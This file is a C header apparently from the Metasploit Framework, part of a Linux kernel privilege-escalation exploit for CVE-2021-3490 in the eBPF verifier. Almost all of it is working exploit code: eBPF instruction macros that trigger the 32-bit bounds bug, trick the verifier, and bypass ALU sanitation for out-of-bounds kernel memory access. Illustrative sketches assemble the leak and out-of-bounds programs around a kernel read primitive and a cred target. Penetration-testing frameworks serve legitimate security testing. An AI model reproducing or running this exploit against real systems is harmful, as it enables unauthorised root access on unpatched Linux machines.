/*
 * rapid7/metasploit-framework
 * external/source/exploits/CVE-2021-3490/Linux_LPE_eBPF_CVE-2021-3490/include/exploit_configs.h
 */
#ifndef _EXPLOIT_CONFIGS_H_
#define _EXPLOIT_CONFIGS_H_

#define ARRAY_MAP_SIZE 0x1337
#define DUMMY_MAP_ADD  0x1000

#define EXPLOIT_STATE_CLEAN 0
#define EXPLOIT_STATE_READ  1
#define EXPLOIT_STATE_WRITE 2

#define STORE_MAP_REG    BPF_REG_2
#define OOB_MAP_REG      BPF_REG_3
#define EXPLOIT_REG      BPF_REG_4
#define CONST_REG        BPF_REG_5
#define LEAK_VAL_REG     BPF_REG_6
#define UNKOWN_VALUE_REG BPF_REG_7
#define COPY_REG         BPF_REG_8


typedef struct exploit_context
{
    int oob_map_fd;
    int store_map_fd;
    int prog_fd;
    uint64_t oob_map_ptr;
    uint64_t array_map_ops;
    uint64_t init_pid_ns_kstrtab;
    uint64_t init_pid_ns;
    uint64_t cred;
    uint32_t state;
} exploit_context;
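
/*
 * A minimal setup sketch (illustrative, not part of the exploit): the two
 * array maps referenced by exploit_context could be created with the raw
 * bpf(2) syscall roughly as below. The store map's value size (0x1000) and
 * the helper names here are assumptions.
 */
#if 0
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/bpf.h>

static int create_array_map(uint32_t value_size, uint32_t max_entries)
{
    union bpf_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.map_type    = BPF_MAP_TYPE_ARRAY;
    attr.key_size    = sizeof(uint32_t);
    attr.value_size  = value_size;
    attr.max_entries = max_entries;
    return (int)syscall(SYS_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

static int setup_maps(exploit_context* pCtx)
{
    /* oob map: a single large value the corrupted pointer is walked out of */
    pCtx->oob_map_fd   = create_array_map(ARRAY_MAP_SIZE, 1);
    /* store map: scratch space for the "unknown" value and leaked data */
    pCtx->store_map_fd = create_array_map(0x1000, 1);
    pCtx->state        = EXPLOIT_STATE_CLEAN;
    return (pCtx->oob_map_fd < 0 || pCtx->store_map_fd < 0) ? -1 : 0;
}
#endif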


// The exploit primitive is an eBPF program split into two parts. The first part only triggers the bug, leaving EXPLOIT_REG with incorrect 32-bit bounds (u32_min_value=1, u32_max_value=0).
// The second part makes the eBPF verifier believe EXPLOIT_REG holds the value 0 while its actual runtime value is 1. The primitive is split because the first part alone is enough to leak
// the pointer to the BPF array map used for OOB reads/writes.

#define exploit_primitive_pt1(oob_map_fd, store_map_fd) \
/* load oob_map values ptr into reg_0 */ \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), \
BPF_LD_MAP_FD(BPF_REG_1, oob_map_fd), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* check if the returned map value pointer is valid */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* save oob map value ptr into preserved register reg_7 */ \
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), \
/* load store_map values ptr into reg_0 */ \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), \
BPF_LD_MAP_FD(BPF_REG_1, store_map_fd), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* check if the returned map value pointer is valid */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* store the map value pointer into designated register */ \
BPF_MOV64_REG(STORE_MAP_REG, BPF_REG_0),\
/* save the oob map value pointer in the designated register */ \
BPF_MOV64_REG(OOB_MAP_REG, BPF_REG_7), \
/* prepare return value in reg_0 */ \
BPF_MOV32_IMM(BPF_REG_0, 0), \
/* load "unknown" value from the map, the real runtime value is 0 */ \
BPF_LDX_MEM(BPF_DW, UNKOWN_VALUE_REG, STORE_MAP_REG, 0), \
/* load "unknown" value into exploit register so it begins with a tnum mask of 0xFFFFFFFFFFFFFFFF */ \
BPF_MOV64_REG(EXPLOIT_REG, UNKOWN_VALUE_REG), \
/* constant register value is 0xFFFFFFFF */ \
BPF_MOV32_IMM(CONST_REG, 0xFFFFFFFF), \
/* constant register value is 0xFFFFFFFF00000000 */ \
BPF_ALU64_IMM(BPF_LSH, CONST_REG, 32), \
/* exploit register has tnum mask of 0xFFFFFFFF00000000 since now the bottom 32 bits are known to be 0 */ \
BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, CONST_REG), \
/* exploit register has tnum value 0x1 and mask of 0xFFFFFFFF00000000 */ \
BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1), \
/* constant register value is 0x1 */ \
BPF_MOV64_IMM(CONST_REG, 0x1), \
/* constant register value is 0x100000000 */ \
BPF_ALU64_IMM(BPF_LSH, CONST_REG, 32), \
/* constant register value is 0x100000002 */ \
BPF_ALU64_IMM(BPF_ADD, CONST_REG, 2), \
/* trigger the bug, exploit register has u32_min_value=1,u32_max_value=0 */ \
BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, CONST_REG)
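
/*
 * A minimal sketch of how pt1 alone could be assembled for the leak stage,
 * assuming the BPF_* instruction helper macros from the kernel's filter.h
 * are in scope. The macro expands to a comma-separated list of struct
 * bpf_insn, so it drops straight into an instruction array; the OOB-read
 * instructions that pull the map header fields (e.g. array_map_ops) into
 * the store map are elided as placeholders.
 */
#if 0
struct bpf_insn leak_prog[] = {
    exploit_primitive_pt1(oob_map_fd, store_map_fd),
    /* ... OOB-read instructions using EXPLOIT_REG's bad bounds go here ... */
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
};
#endif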

#define exploit_primitive_pt2 \
/* exploit register has u32_min_value=2,u32_max_value=1 */ \
BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1), \
/* conditional so that unknown value register has u32_min_value=0,u32_max_value=1 */ \
BPF_JMP32_IMM(BPF_JLE, UNKOWN_VALUE_REG, 1, 1), \
BPF_EXIT_INSN(), \
/* bounds from each register are added, exploit reg now has u32_min_value=u32_max_value=2, verifier believes lower 32 bits are constant and equal to 2 */ \
BPF_ALU64_REG(BPF_ADD, EXPLOIT_REG, UNKOWN_VALUE_REG), \
/* clear the top 32 bits, verifier believes exploit reg is constant value of 2 (during runtime the value is 1) */ \
BPF_MOV32_REG(EXPLOIT_REG, EXPLOIT_REG), \
/* verifier believes exploit register is 0, because 2 & 1 = 0, runtime value is still 1 */ \
BPF_ALU64_IMM(BPF_AND, EXPLOIT_REG, 1), \
/* make a copy of exploit register to do dummy map operations */\
BPF_MOV64_REG(COPY_REG, EXPLOIT_REG), \
/* add a constant value to map value pointer to set alu_limit = DUMMY_MAP_ADD, to bypass runtime ALU sanitation */ \
BPF_ALU64_IMM(BPF_ADD, OOB_MAP_REG, DUMMY_MAP_ADD), \
/* copy register value is DUMMY_MAP_ADD - 1, verifier believes it is 0 */\
BPF_ALU64_IMM(BPF_MUL, COPY_REG, DUMMY_MAP_ADD - 1), \
/* subtract most of the DUMMY_MAP_ADD we just added (COPY_REG is DUMMY_MAP_ADD - 1 at runtime); because the verifier believes copy register is 0, alu_limit remains unchanged */ \
BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, COPY_REG), \
/* subtract the remaining byte, so runtime ALU sanitation checks are passed on versions not patched for CVE-2020-27171 */ \
BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG)
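
/*
 * A minimal sketch of the combined primitive, again assuming the kernel's
 * BPF_* insn helpers: the believed-zero EXPLOIT_REG is scaled by an
 * attacker-chosen offset (0x50 here is arbitrary) and subtracted from the
 * map value pointer, so the verifier still tracks the pointer as in-bounds
 * while at runtime it is displaced before the map values, into the bpf_map
 * header. The trailing load/store/exit is an illustrative placeholder, not
 * the exploit's exact OOB sequence.
 */
#if 0
struct bpf_insn oob_prog[] = {
    exploit_primitive_pt1(oob_map_fd, store_map_fd),
    exploit_primitive_pt2,
    /* believed: 0 * 0x50 = 0; runtime: 1 * 0x50 = 0x50 */
    BPF_ALU64_IMM(BPF_MUL, EXPLOIT_REG, 0x50),
    BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG),
    /* read 8 bytes through the displaced pointer into the store map */
    BPF_LDX_MEM(BPF_DW, LEAK_VAL_REG, OOB_MAP_REG, 0),
    BPF_STX_MEM(BPF_DW, STORE_MAP_REG, LEAK_VAL_REG, 0),
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
};
#endif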


int kernel_read(exploit_context* pCtx, uint64_t addr, char* buffer, uint32_t len);
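
/*
 * Usage sketch (return-value semantics assumed: 0 on success): once the
 * context holds a working read primitive, arbitrary kernel memory can be
 * dumped through it, e.g. re-reading the leaked ops pointer as a sanity
 * check.
 */
#if 0
char buf[8];
if (kernel_read(pCtx, pCtx->array_map_ops, buf, sizeof(buf)) == 0) {
    /* buf now holds the first 8 bytes at array_map_ops */
}
#endif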

#endif /* _EXPLOIT_CONFIGS_H_ */